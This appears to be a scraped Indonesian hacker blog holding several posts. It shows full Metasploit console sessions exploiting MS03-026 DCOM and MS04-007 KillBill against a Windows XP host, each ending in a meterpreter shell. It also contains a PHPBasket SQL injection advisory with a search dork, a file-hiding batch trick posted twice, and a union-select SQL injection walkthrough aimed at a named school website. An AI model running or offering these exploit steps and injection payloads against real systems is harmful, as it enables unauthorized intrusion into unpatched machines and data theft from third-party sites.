this is an old exploit but still works
i have test it on Local Area Network here
this exploit tested on Windows XP Service Pack 1
[o] DCOM RPC Exploit (ms03_026_dcom)
# Description
This module exploits a stack overflow in the RPCSS service, this
vulnerability was originally found by the Last Stage of Delirium
research group and has bee widely exploited ever since. This module
can exploit the English versions of Windows NT 4.0 SP3-6a, Windows
2000, Windows XP, and Windows 2003 all in one request :)
root@ubuntu:~# ping 172.16.1.31
PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.
64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms
64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms
64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms
^C
--- 172.16.1.31 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms
root@ubuntu:~# nmap -O -PN 172.16.1.31
Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT
Interesting ports on ******-******.kapukvalley.net (172.16.1.31):
Not shown: 1710 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open upnp
MAC Address: 00:1C:F0:5A:98:AF (D-Link)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds
root@ubuntu:~# cd /home/noge/pentest/metasploit/
root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.3-dev
+ -- --=[ 378 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 154 aux
msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms03_026_dcom) > set TARGET 0
TARGET => 0
msf exploit(ms03_026_dcom) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.1.31 yes The target address
RPORT 135 yes The target port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 172.16.1.31 no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] The DCERPC service did not reply to our request
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >
=============================================================================================
=============================================================================================
[o] KILLBILL SMB Exploit (ms04_007_killbill)
# Description
This is an exploit for a previously undisclosed vulnerability in the
bit string decoding code in the Microsoft ASN.1 library. This
vulnerability is not related to the bit string vulnerability
described in eEye advisory AD20040210-2. Both vulnerabilities were
fixed in the MS04-007 patch. You are only allowed one attempt with
this vulnerability. If the payload fails to execute, the LSASS
system service will crash and the target system will automatically
reboot itself in 60 seconds. If the payload succeeeds, the system
will no longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A reboot is
required to restore proper functioning of an exploited system. This
exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encounted when using the
equivalent bind payloads. Your mileage may vary.
msf > use windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_007_killbill) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST yes The target address
RPORT 445 yes Set the SMB service port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms04_007_killbill) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST 172.16.1.31 yes The target address
RPORT 445 yes Set the SMB service port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 172.16.1.31 no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > exploit
[*] Started bind handler
[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >
Who Am I???
06 Juni 2010
Metasploit Proof of Concept [ Linux ]
| About Me: |
04 Juni 2010
PHPBasket 4.0 - SQL Injection Vulnerability
[o] PHPBasket 4.0 SQL Injection Vulnerability
Software : PHPBasket version 4.0
Vendor : http://www.phpbasket.com/
Author : NoGe
[o] Vulnerable file
product.php
[o] Exploit
http://localhost/[path]/product.php?cat_id=[sql]
[o] Dork
"Powered by PHPBasket"
Software : PHPBasket version 4.0
Vendor : http://www.phpbasket.com/
Author : NoGe
[o] Vulnerable file
product.php
[o] Exploit
http://localhost/[path]/product.php?cat_id=[sql]
[o] Dork
"Powered by PHPBasket"
| About Me: |
Hidden Files and Folders
[x]
how to hidden files or folders in windows without using any software?
maybe this is an old trick but still good and works :)
this trick will keep your files and folders hidden even you have choose option "show hidden files and folders" in "folder option" :p
tested on windows xp and windows vista home premium
[x]
first write this script and save as open.bat
attrib -a -s -h [ folder or file to hidden ]
attrib -a -s -h open.bat
attrib -a -s -h close.bat
second write this script and save as close.bat
attrib +a +s +h [ folder or file to hidden ]
attrib +a +s +h open.bat
attrib +a +s +h close.bat
[x]
script explaination
attrib : displays or changes file attributes
a : archive file attribute
s : system file attribute
h : hidden file attribute
+ : sets an attribute
- : clears an attribute
attrib +a +s +h [ folder or file to hidden ]
you can put your files or folders name there
if you hidden a file dont forget to write down the file extention to
example
attrib +a +s +h pic.jpg <== hidden file name
attrib +a +s +h folderz <== hidden folder name
what about this two files?
attrib +a +s +h open.bat <== hidden open.bat
attrib +a +s +h close.bat <== hidden close.bat
attrib -a -s -h open.bat <== show open.bat
attrib -a -s -h close.bat <== show close.bat
why we put this two files into the script to?
we must hidden this files to or anyone will open your hidden stuff
if you have many folder to hide you can add into the script like this
add this into close.bat
attrib +a +s +h folder1
attrib +a +s +h folder2
attrib +a +s +h folder3
dont forget to add into open.bat to
attrib -a -s -h folder1
attrib -a -s -h folder2
attrib -a -s -h folder3
[x]
how to show it again?
you must have WINRAR to show your hidden stuff
open WINRAR and go to folder or drive where you hidden your stuff
WINRAR will show all hidden files or folders include open.bat and close.bat
click open.bat to show all your hidden stuff
how to hidden files or folders in windows without using any software?
maybe this is an old trick but still good and works :)
this trick will keep your files and folders hidden even you have choose option "show hidden files and folders" in "folder option" :p
tested on windows xp and windows vista home premium
[x]
first write this script and save as open.bat
attrib -a -s -h [ folder or file to hidden ]
attrib -a -s -h open.bat
attrib -a -s -h close.bat
second write this script and save as close.bat
attrib +a +s +h [ folder or file to hidden ]
attrib +a +s +h open.bat
attrib +a +s +h close.bat
[x]
script explaination
attrib : displays or changes file attributes
a : archive file attribute
s : system file attribute
h : hidden file attribute
+ : sets an attribute
- : clears an attribute
attrib +a +s +h [ folder or file to hidden ]
you can put your files or folders name there
if you hidden a file dont forget to write down the file extention to
example
attrib +a +s +h pic.jpg <== hidden file name
attrib +a +s +h folderz <== hidden folder name
what about this two files?
attrib +a +s +h open.bat <== hidden open.bat
attrib +a +s +h close.bat <== hidden close.bat
attrib -a -s -h open.bat <== show open.bat
attrib -a -s -h close.bat <== show close.bat
why we put this two files into the script to?
we must hidden this files to or anyone will open your hidden stuff
if you have many folder to hide you can add into the script like this
add this into close.bat
attrib +a +s +h folder1
attrib +a +s +h folder2
attrib +a +s +h folder3
dont forget to add into open.bat to
attrib -a -s -h folder1
attrib -a -s -h folder2
attrib -a -s -h folder3
[x]
how to show it again?
you must have WINRAR to show your hidden stuff
open WINRAR and go to folder or drive where you hidden your stuff
WINRAR will show all hidden files or folders include open.bat and close.bat
click open.bat to show all your hidden stuff
| About Me: |
02 Juni 2010
Simple SQL
Wellcome friend…
Ini pertama kalinya saya mencoba untuk menulis dalam sebuah blog,jadi kalo masih banyak kekurangan jangan gebugin saya..tapi kalo ada kelebihan, silahkan donate ke rekening saya…:P
Pertama saya akan mencoba menjelaskan tentang SQL injection,tapi cuma dikit aja maslahnya belum ada yg donate sich…J
Kalo master² mau nambahin silahkan….
Kalo temen² mau kasih comment, boleh aja tapi donate dulu…xixixiixxi
Ok,langsung aja degh…
1. About Sql Injection
Sql Injection merupakan trik untuk menyuntikan air uang(translated)..hihihi salah.maksudnya menyuntikan Permintaan SQL / perintah sebagai masukan yg memungkin melalui halaman web ataupun melalui url.
Singkat kan??makanya donate,biar saya punya cukup uang buat makan dan cukup tenaga buat ngetik…xixixixi. Ujung²nya suruh donate juga…J
2. Apa yg di butuhkan?
3 Kg tepung imajinasi, 1,5 Kg kreatifitas, 800 gram logika, 400 gram kesabaran.
Dan yg paling penting harus ada koneksi internet dan web browser apapun. Dan jangan lupa juga 2 bungkus mallboro mix dan 1 botol bir.J
3. Apa yg harus kita cari??
Pertama kita cari warnet yg murah dulu ( bagi yg blom punya laptop,like me ),,trus cari tempat yg nyaman,ga terlalu dingin dan ga terlalu panas,,trus bubu aja disitu..hehehe..bcandanya maksa,,ga lucu geto loch…
Harap maklum..lagi kelaperan nih…
Udah mulai serius nih,udah adzan subuh..xixixi ga ada hubungannya..
Kita cari target di google dengan dork apa aja sesuka hati.
Missal: site:com cilacap
Artinya kita mencari web .com dan yg mengandung kata cilacap.
Missal kita dapet http://sman1clp.com
Kita cari id nya http://sman1clp.com/index.php?cat=berita&idberita=50
Selanjutnya kita cek web tersebut vulner atau gak..
Caranya kita kasih tanda – di depan angka id nya.
Jadi http://sman1clp.com/index.php?cat=berita&idberita=-50
Apa yg terjadi??blank…
Yup, jika kita masukan – didepan angka id dan web menjadi blank atau keluar pesan eror,itu artinya web tersebut vulner.
Selanjutnya kita cari binery nya. Caranya dengan perintah union select.
http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1--
tanda + adalah string Sql yg berarti spasi.sama saja dengan %20. dan -– juga bisa diganti dengan /* untuk lebih jelasnya tentan g-string² SQL, Tanya mbah google.
Ok,kembali ke tanktop..
Setelah kita masukin union select, apa yg terjadi??
The used SELECT statements have a different number of columns
Kita tambahkan binerynya
http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2--
ternyata masih The used SELECT statements have a different number of columns
tambahkan lagi sampe true dan ga kluar lagi pesan tsb.
Ok, kita dapet
http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2,3,4,5,6,7--
| 3 |
| Pengirim : 2, [ 6] |
| |
| 5 |
ada apa dengan angka² tersebut????
Temukan jawabannya di Tutor SQL Part 2 hehehehehhehe..
| About Me: |
Langgan:
Entri (Atom)
